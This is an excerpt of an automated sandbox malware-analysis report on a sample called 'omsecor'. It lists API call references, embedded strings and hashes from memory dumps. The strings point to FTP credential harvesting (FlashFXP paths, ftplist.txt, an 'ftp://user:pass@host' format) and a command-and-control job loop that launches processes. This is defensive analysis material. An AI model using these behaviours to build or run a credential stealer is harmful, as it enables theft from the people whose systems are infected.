                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3711279109-0
                                                                                                                                                                                                                • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                                                                                                                                                                                                                • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                • String ID: _self$http$+@
                                                                                                                                                                                                                • API String ID: 1473721057-3317424838
                                                                                                                                                                                                                • Opcode ID: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
                                                                                                                                                                                                                • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Open$CloseQueryValue
                                                                                                                                                                                                                • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                                                                                                                                                                                                                • API String ID: 3546245721-1332223170
                                                                                                                                                                                                                • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                                                                                                                                                                                                                • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                                                                                                                                                                                                                • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                                                                                                                                                                                                                  • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                                                                                                                                                                                                                  • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                                                                                                                                                                                                                  • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                                                                                                                                                                                                                • String ID: Shell_TrayWnd$eventConn
                                                                                                                                                                                                                • API String ID: 2141107913-3455059086
                                                                                                                                                                                                                • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                                                                                                                                                                                                                • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00404913
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00404925
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00404935
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00404947
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                                  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                                  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                                  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                                • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                                                                                                                                                                                                                • API String ID: 1635188419-1322549247
                                                                                                                                                                                                                • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                                                                                                                                                                                                                • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00407387
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0040738D
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                                                                                                                                                                                                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3166187867-0
                                                                                                                                                                                                                • Opcode ID: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                                                                                                                                                                                                                • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: http$+@
                                                                                                                                                                                                                • API String ID: 0-4127549746
                                                                                                                                                                                                                • Opcode ID: c2f59c2b5613c0f8dd3e4d6de400bb210f2aef3e4c88ef312eb644251266033a
                                                                                                                                                                                                                • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2f59c2b5613c0f8dd3e4d6de400bb210f2aef3e4c88ef312eb644251266033a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: EnvironmentExpandFolderOpenPathStrings
                                                                                                                                                                                                                • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                                                                                                                                                                                                                • API String ID: 1994525040-4055253781
                                                                                                                                                                                                                • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                                                                                                                                                                                                                • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004099EB
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004099F9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: </domain>$</url>$<domain>$<url>$http://
                                                                                                                                                                                                                • API String ID: 2525500382-924421446
                                                                                                                                                                                                                • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                                                                                                                                                                                                                • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(7644F6A0), ref: 00408F82
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3341692771-0
                                                                                                                                                                                                                • Opcode ID: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
                                                                                                                                                                                                                • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 0040ADA4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep$AttemptConnectInternet
                                                                                                                                                                                                                • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                                                                                                                                                                                                                • API String ID: 362191241-2593661552
                                                                                                                                                                                                                • Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                                                                                                                                                                                                                • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                                                                                                                                                                                                                • __FindPESection.LIBCMT ref: 0040D8AC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 876702719-0
                                                                                                                                                                                                                • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                                                                                                                                                                                                                • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004088E4
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004088E9
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004089D3
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004089D8
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004089F3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID: +@
                                                                                                                                                                                                                • API String ID: 3341692771-3835504741
                                                                                                                                                                                                                • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                                                                                                                                                                                                                • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                                                                                                                                                                                                                  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                • _memset.LIBCMT ref: 004025DA
                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                                                                                                                                                                                                                • String ID: none
                                                                                                                                                                                                                • API String ID: 2353737338-2140143823
                                                                                                                                                                                                                • Opcode ID: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                                                                                                                                                                                                                • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004094E6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3341692771-0
                                                                                                                                                                                                                • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                                                                                                                                                                                                                • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
